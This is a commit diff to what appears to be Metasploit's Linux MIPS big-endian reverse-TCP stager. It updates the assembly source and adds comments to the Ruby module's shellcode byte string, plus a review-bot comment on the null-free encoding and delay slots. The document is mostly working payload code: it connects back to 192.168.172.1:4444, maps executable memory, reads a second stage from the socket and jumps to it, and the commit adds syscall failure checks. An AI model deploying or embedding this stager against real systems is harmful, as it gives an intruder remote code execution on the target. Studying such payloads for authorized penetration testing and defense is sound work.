fix reverse tcp stager src
parent
d1f08a80bd
commit
d02d6826a9
|
@ -4,7 +4,7 @@
|
||||||
# Type: Stager
|
# Type: Stager
|
||||||
# Qualities: No Nulls out of the IP / Port data
|
# Qualities: No Nulls out of the IP / Port data
|
||||||
# Platforms: Linux MIPS Big Endian
|
# Platforms: Linux MIPS Big Endian
|
||||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
|
||||||
# License:
|
# License:
|
||||||
#
|
#
|
||||||
# This file is part of the Metasploit Exploit Framework
|
# This file is part of the Metasploit Exploit Framework
|
||||||
|
@ -29,12 +29,11 @@
|
||||||
##
|
##
|
||||||
.text
|
.text
|
||||||
.align 2
|
.align 2
|
||||||
.globl main
|
.globl main
|
||||||
.set nomips16
|
.set nomips16
|
||||||
main:
|
main:
|
||||||
.set noreorder
|
.set noreorder
|
||||||
.set nomacro
|
.set nomacro
|
||||||
|
|
||||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
# a0: domain = PF_INET (2)
|
# a0: domain = PF_INET (2)
|
||||||
# a1: type = SOCK_STREAM (2)
|
# a1: type = SOCK_STREAM (2)
|
||||||
|
@ -47,8 +46,9 @@ main:
|
||||||
slti $a2, $zero, -1
|
slti $a2, $zero, -1
|
||||||
li $v0, 4183
|
li $v0, 4183
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||||
|
|
||||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||||
# a0: sockfd
|
# a0: sockfd
|
||||||
|
@ -69,6 +69,8 @@ main:
|
||||||
nor $a2, $t4, $zero
|
nor $a2, $t4, $zero
|
||||||
li $v0, 4170
|
li $v0, 4170
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
|
||||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
# a0: addr = -1
|
# a0: addr = -1
|
||||||
|
@ -92,7 +94,8 @@ main:
|
||||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
li $v0, 4090
|
li $v0, 4090
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||||
|
|
||||||
# read(sockfd, addr, 4096)
|
# read(sockfd, addr, 4096)
|
||||||
|
@ -106,6 +109,8 @@ main:
|
||||||
addi $a2, $a2, -1
|
addi $a2, $a2, -1
|
||||||
li $v0, 4003
|
li $v0, 4003
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
|
||||||
# cacheflush(addr, nbytes, DCACHE)
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
# a0: addr
|
# a0: addr
|
||||||
|
@ -119,11 +124,20 @@ main:
|
||||||
add $a2, $t1, $0
|
add $a2, $t1, $0
|
||||||
li $v0, 4147
|
li $v0, 4147
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
# jmp to the stage
|
# jmp to the stage
|
||||||
lw $s1, -8($sp)
|
lw $s1, -8($sp)
|
||||||
lw $s2, -4($sp)
|
lw $s2, -4($sp)
|
||||||
jalr $s1
|
jalr $s1
|
||||||
|
|
||||||
|
failed:
|
||||||
|
# exit(status)
|
||||||
|
# a0: status
|
||||||
|
# v0: syscall = __NR_exit (4001)
|
||||||
|
li $a0, 1
|
||||||
|
li $v0, 4001
|
||||||
|
syscall 0x40404
|
||||||
|
|
||||||
.set macro
|
.set macro
|
||||||
.set reorder
|
.set reorder
|
||||||
|
|
|
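Review bot: The new `failed:` block ends at its `syscall 0x40404` on the exit path, while the byte string in the Ruby module on this same page continues with two `move at,at` words after that syscall, so the source as committed still appears not to reassemble to exactly the bytes the module carries; either append those two null-free nops here or state in the file header that the trailing padding is added by the module. The `slt $s0, $zero, $a3` / `bne $s0, $zero, failed` pairs depend on the o32 convention that the kernel leaves a non-zero `$a3` when a syscall fails, which nothing in the file says; a comment such as `# a3 != 0 => syscall failed (o32 error flag); s0 = (0 < a3)` on the first pair would save the next reader a trip to the ABI docs. Because the file is under `.set noreorder`, the word after each `bne` is a delay slot executed on both paths — for the socket check that is `sw $v0, -4($sp)`, and for `jalr $s1` it is now `li $a0, 1` — which is harmless as written but deserves a one-line comment so a later edit does not insert something non-trivial there. The enclosing `main` continues outside the hunks shown.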
@ -41,6 +41,7 @@ module MetasploitModule
|
||||||
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
||||||
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
||||||
"\x24\x02\x10\x57" + # li v0,4183
|
"\x24\x02\x10\x57" + # li v0,4183
|
||||||
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
||||||
|
@ -58,6 +59,7 @@ module MetasploitModule
|
||||||
"\x24\x0c\xff\xef" + # li t4,-17
|
"\x24\x0c\xff\xef" + # li t4,-17
|
||||||
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
||||||
"\x24\x02\x10\x4a" + # li v0,4170
|
"\x24\x02\x10\x4a" + # li v0,4170
|
||||||
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
||||||
|
@ -74,6 +76,7 @@ module MetasploitModule
|
||||||
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
||||||
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
||||||
"\x24\x02\x0f\xfa" + # li v0,4090
|
"\x24\x02\x0f\xfa" + # li v0,4090
|
||||||
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
||||||
|
@ -83,6 +86,7 @@ module MetasploitModule
|
||||||
"\x24\x06\x10\x01" + # li a2,4097
|
"\x24\x06\x10\x01" + # li a2,4097
|
||||||
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
||||||
"\x24\x02\x0f\xa3" + # li v0,4003
|
"\x24\x02\x0f\xa3" + # li v0,4003
|
||||||
|
# read(sockfd, addr, 4096)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
||||||
|
@ -92,6 +96,7 @@ module MetasploitModule
|
||||||
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
"\x01\x20\x30\x20" + # add a2,t1,zero
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
"\x24\x02\x10\x33" + # li v0,4147
|
"\x24\x02\x10\x33" + # li v0,4147
|
||||||
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
||||||
|
@ -101,6 +106,7 @@ module MetasploitModule
|
||||||
# 4006bc <failed>:
|
# 4006bc <failed>:
|
||||||
"\x24\x04\x00\x01" + # li a0,1
|
"\x24\x04\x00\x01" + # li a0,1
|
||||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||||
|
# exit(status)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x20\x08\x25" + # move at,at
|
"\x00\x20\x08\x25" + # move at,at
|
||||||
"\x00\x20\x08\x25" # move at,at
|
"\x00\x20\x08\x25" # move at,at
|
||||||
|
|